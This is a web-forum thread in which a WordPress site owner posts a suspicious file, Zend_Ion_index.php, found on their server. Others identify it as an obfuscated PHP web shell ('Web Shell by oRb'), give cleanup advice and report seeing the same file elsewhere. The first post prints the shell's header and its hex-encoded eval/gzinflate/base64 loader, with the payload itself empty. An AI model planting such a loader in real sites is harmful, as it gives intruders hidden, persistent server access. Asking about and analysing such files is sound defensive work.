I checked my wordpress servers daily .. found this newly updated file Zend_Ion_index.php , deleted it .. just wondering, what does this do ? So that i can further check if my files are infected. I changed my ftp password, did a scan on the pc already. i found several other sites online infected with this too .. seems like open a password code thing to change the files on the server ? <?PHP # Web Shell by oRb $auth_pass = "439b9c85f0bc1db31c288d84a04fdb8a"; $color = "#df5"; $default_use_ajax = true; $default_charset = 'Windows-1251'; $o = ;eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); ?> Code (markup):
That is a PHP based "shell". It allows a hacker to have access to your files and the server your website is hosted on. Generally people put up a "shell" so that if you fix the original way they hacked your website they will still have access so they can gain access in the future. It appears that they have encoded the actual code for the shell as to avoid server anti viruses. Smart move removing that. You should check your logs and figure out how it got there in the first place to avoid it happening again, you also might want to change your administrator password.
Hello: I found the same file in my server "Zend_Ion_Index.Php" the account with this file is empty, not related to Wordpress installation. If you search in google for this file appears a lot of sites compromised.. I don't know the vulnerability yet. Maybe PHP 5.3.9, because the file is created before an update to 5.3.10... Please, if you have more information post it. Thanks you very much.